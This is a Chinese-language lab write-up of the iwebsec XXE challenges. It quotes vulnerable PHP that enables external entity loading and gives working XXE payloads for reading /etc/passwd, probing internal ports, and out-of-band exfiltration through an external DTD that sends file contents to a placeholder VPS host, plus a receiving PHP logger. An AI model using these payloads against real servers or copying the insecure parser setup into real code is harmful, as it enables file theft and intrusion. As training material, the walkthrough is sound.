iwebsec通关笔记-xxe篇

xxe攻击实际上就是将用户恶意输入的xml语言进行解析，让被攻击服务器发起网络请求加载攻击方服务器恶意文件，或者访问自身服务器文件，可以实现文件读取、命令执行、内网攻击、SSRF（服务器端请求伪造）和 DoS 攻击等危害。等等

三个关卡公用一个源码，先分析一下源码

libxml_disable_entity_loader (false); $xmlfile = file_get_contents('php://input'); $dom = new DOMDocument(); if($xmlfile){ $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); $creds = simplexml_import_dom($dom); $username = $creds->username; $password = $creds->password; } else{ exit(); } ?> <table class='table table-striped'> <?php echo 'hello ' . $username; echo "</table>"; ?>

第一行代码就是问题所在，允许加载外部实体，为防止xml注入一般要改为true

1.xxe读取文件

直接写出payload

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY evil SYSTEM "file:///etc/passwd"> ]> <root> <username>&evil;</username> <password>123456</password> </root>

源码中接收的参数实体为username，password，而username里面的参数&evil被替换到为了

"file:///etc/passwd",且有回显，打印到了页面上

其中的Content-Type参数需要自己添加上去，包括这里也能使用php伪协议读取文件

同样成功

2.xxe实现内网探测

xxe可以判断服务器内网端口是否开放

直接修改命令就行了

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY evil SYSTEM "http://192.168.22.136:8002"> ]> <root> <username>&evil;</username> <password>123456</password> </root>

判断端口开放的依据是时间但是我这里不知道为什么感觉时间都差的不多

我就测试了这几个端口只有3306端口返回是异常的慢的，但是其他的端口时间都差不多

3.针对不回显的xxe注入可以通过带外处理

这个可以让他解析外部网站的文件，通过访问解析vps上的文件使她本地给出文件内容

vps创建两个文件

test.dtd文件

<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://YOUR_VPS/get.php?data=%file;'>"> %all;

get.php文件

<?php $data = $_GET['data']; file_put_contents('xxe.log', base64_decode($data)."\n", FILE_APPEND); ?>

xxe注入代码

<?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd"> <!ENTITY % remote SYSTEM "http://test.xxe:999/test.dtd"> %remote; %all; ]> <root> <username>&send;</username> <password>123</password> </root>

访问后会在你自己的目录下生成一个xxe.log文件，但是我这里始终成功不了不知道为什么